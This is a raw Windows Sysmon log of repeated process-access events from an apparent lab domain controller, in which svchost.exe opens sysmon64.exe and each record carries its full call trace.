12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.403{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.403{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.402{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.402{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.402{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.402{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.402{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.402{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.402{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.396{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.396{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.396{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.396{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.396{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.396{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.396{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.396{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.395{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 